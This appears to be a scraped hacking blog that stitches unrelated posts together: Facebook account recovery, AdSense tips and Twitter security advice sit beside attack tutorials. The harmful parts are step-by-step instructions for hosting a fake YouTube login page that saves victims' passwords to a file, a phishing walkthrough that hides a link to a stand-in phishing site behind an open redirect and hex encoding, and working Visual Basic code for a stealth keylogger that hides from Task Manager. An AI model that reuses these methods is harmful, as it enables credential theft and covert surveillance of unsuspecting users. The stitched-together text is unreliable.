These days there are many ways a facebook account can be hacked easily and many people are falling victims to these hackers. Its very easy to get trapped by hackers, they use more sophisticated methods to do it. And are you in such a situation? Did some one hacked your facebook account ?

There should be any thing to worry if it is yes. Before losing hope there are some things that can be done to get your Hacked Face Book Account Back.
First of all you can try resetting your account password on facebook. But this could help only in rare cases, because most hackers are intelligent and they surely will have changed the default email address. But if some body have accidentally (though the chances are extremely narrow) logged into your account and has changed only the password of your face book account, this might help you in recovering your account password and gain access to your compromised account.

But things get much more worse when the hacker changes the email address in your Face Book Account. You’ll no longer be able to reset the account password and gain access to the account.

But there is a way.

Face Book provides a contact page for you to help you to in recovering the hacked account .

Visit http://www.facebook.com/help/contact.php?show_form=account_compromised

Inside the contact Form You need to Fill in the Following Details Correctly.

Full name on the account:

Enter the Full Name as you have given in Your Face Book Account.

Network(s) the account belongs to:

Enter the names of the networks you have joined. Include as many as possible.

Email addresses that may be affiliated with the account:

This is the email address you used as username to login to face book.

Your contact email address:

Enter a email address you can be contacted by facebook. They will contact you regarding this issue.

URL (web address link) of the profile page:

Give the link to your facebook profile address.

Description and steps to reproduce the issue:

Provide as much as information in here regarding how your face book account was hacked etc. It is recommended to include the time and date when you were able to access your account for the last time.

Today we will focus on the easiest way i.e Fake login page
A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmailyoutube,friendster etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.

First of all download:Youtube fake login page

PROCEDURE:

1.once you have downloded youtube fake login page,now extract contents in a folder
2.In that ,find (CTRL+F) ‘http://hackingaday.com’ then change it to your destined URL but don’t forget ‘\’.
Save it .
3.Open Fake page in wordpad
4.Now press ctrl+F and search for the term “action=” now change its value to pass.php i.e. action=pass.php
5.Create an id in www.110mb.com , because i know about that site quite well.

6.Then upload the contents into a directory

7.For that,after creating an id you should go to file manager and upload all these files.

8.Then just got to youtube.htm and try out whether its working .
After you type in the file , a password file named pass.txt will be created in the same directory.Then you can see what username and password you have entered.

Friend : Hi Govinda! Need some help bro

Me : Yes, what help do you need bro?

Friend : Actually, I am going broke. Dad’s not giving me enough money. I took a free co.cc domain and blogged for 2 days and applied for Adsense. But Adsense flatly refused my application. All my posts were original. What should I do?

Me : LOL Wait till I write a article on my site, then you will understand where you went wrong. You, like other new bloggers, have taken Adsense for granted.

Most of the bloggers (basically, even I) took to blogging just for Adsense. People make the mistake of linking money with Adsense. They think that all they need is a few posts (which they do by copy pasting or intelligent ones spin those articles). Day by day, the adsense policies are getting stricter. As of now, these are the compulsory requirements for getting Adsense approved on your website.

Buy a Top Level Domain :

Many new bloggers make this mistake. Moments after making the decision of blogging, they head over to blogspot and get a free blog. Some of them try taking co.cc domains and host it on a free hosting. My dear friend, you need to a bit more professional when you think of earning money. You strictly need a Told Level Domain. The best top level domain is “.com” domain. Just head over to some domain registrar and go get one for just about $9. You can even get coupon codes that give free domain for first year or domain for just $1 only. All you need is a bit of Google searching.

Age Of Website :

For your website to be qualified for Adsense, you need a good aged website. Your blog must be minimum 6 months old before you can apply for Adsense.

Write Original Content :

Who would like copied articles? Same is the case with Adsense. These guys have advanced checkers that can easily detect whether the articles are authentic or just some copy paste. Your site can only have content that agree to Google Adsense’s policy. Hacking tutorials or tricks are a strict no no. In a word, everything that you post should be LEGAL. Also, just having a few original articles won’t do the trick. You must have atleast 50-60 originals before you think of applying.

Having Some IMPORTANT Pages :

Your website must have important pages like Privacy Policy and Terms Of Use. Such things elevate the level of professionalism of your website and can impress the people at Google. Also, tend to AVOID popups like subscription boxes on the home page. This shows that you are making the website for only making profits and not sharing information.

Traffic :

Traffic is definitely a important criterion for getting Adsense. Adsense will never accept your site if you have very less traffic because they will stand at a loss. Low traffic website owners sometimes do illegal things like ‘click exchange’ which results in losses for both Adsense and the websites who advertise on Adsense. So you need to have a site that generates constant traffic.

Just make a small checklist and try to assess your website with the following points. I am sure you must be getting rejected because you don’t comply to one of the terms. Enjoy blogging!

Twitter much like Facebook is popular social networking site and these sites users are targeted with phishing scams luring them to reveal their username and passwords.Here are some security tips for twitter users for safe tweeting.

Tips to secure twitter account..

1.Use strong and Unique password : Use the password for your twitter account as a combination of characters, symbols and numbers. Never use same password for different websites and email accounts, use unique password for every website.

2. Be aware of fake twitter websites, try to type twitter.com in your browser and enter your account credentials.

3. Always use extensions for browsers like Chrome and Firefox which shows preview for shortened links on twitter. Because you may be lured to click on a malicious link to steal your twitter username and password.

4.Keep your computer up to date with antivirus and anti-spyware. Looking for free anti-virus AVG offers antivirus and anti-spyware, and also protects from malicious links in social networks with it’s LinkScanner.

5.Twitter never asks you for password:Twitter will never asks you to download something and asks to sign into other twitter liked websites with your username and password.Twitter will never reply to you or email you asking for your password.

6.Want to update your account with third party applications make sure they connect to your account using Oauth protocol where you don’t need to share your password. Be careful of third party applications that lure you to give more followers by sharing your username and password.

7.Never use same password for any of your accounts including for twitter.

Image Credit

8. Twitter banned 370 weak passwords make sure you are not using any one of them for your account.

9.Hackers may lure users with malicious links to sign into twitter similar website to give your username and password. Once they take control of your account they post spam messages and other abusive stuff from your account.

10.Don’t retweet blindly without knowing whom tweets you are tweeting , also be aware of clicking DMs containing links from unknown users. A phishing scam may targeted at you through DMs.

11.Use encrypted twitter: Use https://twitter.com instead of http://twitter.com and your twitter session with your tweets, retweets,DMs will be encrypted.

Phishing is usually considered to be most effective when it’s combined with social engineering, the hacker term for human manipulation. One way phishing can be combined with social engineering is through the exploitation of redirect vulnerabilities. This article will demonstrate to you what redirect vulnerabilities are, how to spot them, and how they can be exploited.

So first things first. What is a redirect vulnerability? A redirect vulnerability is when a webpage uses a script to redirect you to somewhere (usually another page on the website), but they write that script in such a way that it allows a hacker to manipulate it to send you to an external page instead of an internal one. There are many types of redirect vulnerabilities, but we’ll be looking at the most basic type here for now. Example: let’s say we’re logging in to webpage that has this url:

Code:

http://www.example.com/login.php?dest=members/index.html

Let’s have a look at the url. It’s all looking pretty ordinary up to login.php, but look one step after that. See the dest=members/index.html? members/index.html is the path to the index page for logged in members, so you can determine that dest=members/index.html is a parameter that is being used by the login.phpscript to redirect users to the member index page after a successful login. Now if the creator of the login.php script was very security conscious, they’d make sure that the dest field could never point to a url that’s not an approved destination. However, if he didn’t know aboutredirect vulnerabilities, he would just write the script so that it would redirect the user to whatever address dest pointed to. In order to find which one we’re dealing with for this website, we can change the dest parameter and see how thescript responds. For instance:

Code:

http://www.example.com/login.php?dest=http://www.google.com

If this page is vulnerable to redirect vulnerabilities, this it should send us to google after we log in. If not, it will generate some sort of error condition and take you to a default page. So if we change the address as specified above, log in, and find ourselves looking at google instead of example.com, then we know it’s vulnerable toredirect vulnerabilities.

Now that you know what redirect vulnerabilities are, can you see how they can be applied to phishing? Let me create a scenario to give you an idea of how redirect vulnerabilities can be used to increase the effectiveness of phishing. Imagine yourself to be a student at a university. You have a school website with the address http://www.myschool.com, and you log in to all your school services (such as mail, course info, etc) through the url

Code:

www.sys.myschool.com/login.php?service=

where the service parameter points to the address of the service being accessed, as demonstrated in the following urls:

Code:

http://www.portal.myschool.com/login.php?service=sys/mail.php
or

http://www.portal.myschool.com/login.php?service=sys/courseInfo.php

Phishers have been targeting students of your school lately, so your system administrators have sent everyone an email telling them to check the url of every webpage they log into with their school account to make sure it’s an actual school page and not aphishing page. A hacker is aware of this, and realizing that this advice will give the you and the other students a false sense of security when you’re on pages that are actual school pages, set out looking for a way to get students to access hisphishing page from within the school login system itself. He sees the above urls and recognizes their potential to be vulnerable to redirect exploitation and creates a phishing page that looks exactly like your school’s page that is displayed to you when your login fails. Being a phishing page, it sends him all the login credentials of everyone who logs in through it. Once he knows that the login script is indeed vulnerable, he creates a link to his phishing page from the school login page, hoping that students will log in to the school through his link, get redirected to his fake page, enter their information again without realizing that they left the school page, and then become redirected back to their school page without even noticing that anything out of the ordinary had happened. He starts out with a link like this:

Code:

http://www.portal.myschool.com/login.php?service=http://badsite.com/fakePage.php

However, he realizes that some of the more observant students might see the external address in the url and be too wary to enter their information, so he changes his url into its hexidecimal representation, either by memory or using a tool like this one: http://secworm.net/showthread.php?tid=3, and achieves an ordinary-looking url like this one:

Code:

http://www.portal.myschool.com/login.php?service=%68%74%74%70%3a%2f%2f%62%61%64%73%69%74%65%2e%63%6f%6d%2f%66%61%6b%6 ?5%50%61%67%65%2e%70%68%70

This url gives no indication that it actually redirects students to the hacker’s phishing page, and since you see your school’s domain in the beginning, you and the students think nothing of it. The hacker then sends this link along with an email making the reader want to log in to the student database and steals all their passwords.

Hopefully this will help you understand the basics of redirect vulnerabilities and how they can be used to increase the effectiveness of phishing.

Intro: What a Keylogger is made of

Before we start programming, we need to answer a basic question: what is a keylogger? As the name implies (key+logger) – a keylogger is a computer program that logs (records) the keys (keyboard buttons) pressed by a user. This should be simple to understand. Lets say that I am doing something at my computer. A keylogger is also running (working) on this computer. This would mean that the keylogger is “listening” to all the keys I am pressing and it is writing all the keys to a log file of some sort. Also, as one might have guessed already, we don’t want the user to know that their keys are being logged. So this would mean that our keylogger should work relatively stealth and must not, in any case, show its presence to the user. Good, now we know what a keylogger as and we have an idea of its functions, lets move on to the next step.

=========================================
Basic Concepts: What needs to be achieved
=========================================
Ok, now lets plan our program, what should such keyloger do and what it should not. Significant difference to previous section is in the sense that here we shall discuss the LOGIC, the instructions that our program will follow.
Keylogger will:
1 – listen to all the key strokes of the user.
2 – save these keys in a log file.
3 – during logging, does not reveal its presence to the user.
4 – keeps doing its work as long as the used is logged on regardless of users actions.

==========================================
Implementation: Converting logic into code
==========================================
We shall use Visual Basic because it is much easier and simple to understand comparing to C++ or Java as far as novice audience is concerned. Although programmers consider it somewhat lame to code in VB but truthfully speaking, its the natural language for writing hacking/cracking programs. Lets cut to the chase – start your VB6 environment and we are ready to jump the ride!

We need a main form, which will act as HQ to the program.

First of all, as our program shall run, we need to make sure it is hidden. This should be very simple to accomplish:
Private Sub Form_Load()
Me.Visisble = False
End Sub
This makes our program invisible to the human eye. To make it invisible to computers eye too, we need to add this line in the Form_Load() event App.TaskVisible = False . This enabled our logger to run in stealth mode and the regular Task Manager will not see our application. Although it will still be possible to see it in the processes tab, there are “ways” to make it hidden. Figure them out yourself, they have nothing to do with programming.

OK, now that our program has run in stealth mode, it should do its essential logging task. For this, we shall be using a whole load of API. These are the interfaces that the Application Platform (windows) itself provides us in those annoying dll files.

There are 3 methods to listen for keys:
* GetAsyncKeyState
* GetKeyboardState
* Windows Hooks

Althought the last method is easier to use, this will not work on Windows98 and also it is NOT very precise. Many people use it, but as my experiences revealed, Keyboard Hooks are only a good way of blocking keys and nothing else. The most exact and precise method in my experience is GetAsyncKeyState().
So lets use this function, but where is that damn thing and how to use it?

Private Declare Function GetAsyncKeyState Lib “USER32″ (ByVal vKey As Long) As Integer
This is how we use a function already present in a dll file. In this case we are using the user32.dll and the function we are using is GetAsyncKeyState(). The arguments (Long vKey), and return value (Long) shall be discussed later, right now its enough to know that this function can listen to keystrokes.

What we need next is to run this function infinitely (as long as the system is running). To do this, just put a Timer control on the form and name it tmrTimer. This timer is used to run the same line of code forever. Note that a while loop with a universally true condition would also accomplish same, but the while loop will certainly hang the system and will lead to its crash as opposed to timer. Timer will not hang the system at all because a while loop tends to carry out the instruction infinitely WITHOUT any break and it also keeps the control to itself, meaning that we cannot do any other job as the loop is running (and with a universally true statement, the while loop will not let the control pass to ANYWHERE else in the program making all the code useless) while the Timer control just carries out the instuction after a set amount of time.

So the two possibilities are:

Do While 1=1
‘our use of the GAKS (GetAsyncKeyState) function Loop

and

Private Sub tmrTimer_Timer()
‘our use of the GAKS function
End Sub

Timer being set, lets move on to see how the GAKS function works and how are we going to use it. Basically what the GAKS function does is that it tells us if a specific key is being pressed or not. We can use the GAKS function like this: Hey GAKS() check if the ‘A’ key is being pressed. And the GAKS function will tell us if it is being pressed or not. Sadly, we can’t communicate with processors like this, we have to use some flamboyant 007 style

If GAKS(65)<>0 Then
Msgbox “The ‘A’ key is being pressed”
Else
Msgbox “The ‘A’ key is not being pressed”
End If
Now lets see how this code works: GAKS uses ASCII key codes and 65 is the ASCII code for ‘A’ If the ‘A’ key is being pressed then GAKS will return a non-zero value (often 1) and if the key is not being pressed then it will return 0. Hence If GAKS(65)<>0 will be comprehended by the VB compiler as “If the ‘A’ key is being pressed”.

Sticking all this stuff together, we can use this code to write a basic functional keylogger:

Private Sub tmrTimer_Timer()
Dim i As Integer
Static data As String
For i = 65 to 90 ‘represents ASCII codes from ‘A’ to ‘Z’
If GAKS(i)<>0 Then data = data & Chr(i)
Next i
If GAKS(32) <> 0 Then data = data & ” ” ‘checking for the space bar
If Len(data)>=100 Then
Msgbox “The last 100 (or a couple more) are these ” & VBNewLine & data
data = “”
End If
End Sub

This alone is enough to create a basic functioning keylogger although it is far from practical use. But this does the very essential function of keylogger. Do try it and modify it to your needs to see how GAKS works and how do the Timer delays affect the functionality of a keylogger. Honestly speaking, the core of our keylogger is complete, we have only to sharpen it now and make it precise, accurate and comprehensive.
The first problem that one encounters using GAKS is that this function is far too sensitive than required. Meaning that if we keep a key pressed for 1/10th of a second, this function will tell us that the key has been pressed for at least 2 times, while it actually was a sigle letter. For this, we must sharpen it. We need to add what I call “essential time count” to this function. This means that we need to tell it to generate a double key press only if the key has been pressed for a specified amount of time. For this, we need a whole array of counters. So open your eyes and listen attentively.

Dim count(0 to 255) As Integer
This array is required for remembering the time count for the keys. i.e. to remember for how long the key has been pressed.

Private Sub tmrTimer_Timer()
Dim i As Integer
Const timelimit As Integer = 10
Static data As String
For i=0 To 255 ‘for all the ASCII codes
If GAKS(i)<>0 Then
If count(i) = 0 Then ‘if the key has just been pressed
data = data & Chr(i)
ElseIf count(i) < timelimit Then
count(i) = count(i) + 1 ‘add 1 to the key count
Else
count(i) = 0 ‘initialize the count
data = data & Chr(i)
End If
Else ‘if the key is not being pressed
count(i) = 0
End If
Next i
End Sub

What we have done here is that we have set a time limit before the GAKS function will tell us that the key is being pressed. This means, in simple words, that if we press and hold the ‘A’ key, the GAKS function will not blindly tell us the ‘A’ key is being pressed, but it will wait for sometime before telling us again that the key is being pressed. This is a very important thing to do, because many users are not very fast typists and tend to press a key for somewhat longer than required.

Now what is left (of the basic keylogger implementation) is just that we write the keys to a file. This should be very simple:

Private Sub timrTimer_Timer()
‘do all the fuss and listen for keystrokes
‘if a key press is detected
Open App.Path & “\logfile.txt” For Append As #1
Print #1, Chr(keycode);
Close #1
End Sub

Note that this is the very basic concept of writing a keylogger, we have yet not added autostart option and neither have we added an post-compile functionality edit options. These are advanced issues for the beginners. If you would like me to write about them, do tell me and I will write about them too, step by step. Please do comment on this article, telling me what it lacks and what was not required in it. Feel free to post this anywhere you like, just make sure you don’t use it for commercial purposes. If you have any questions about any part of it let me know and I will try to answer.
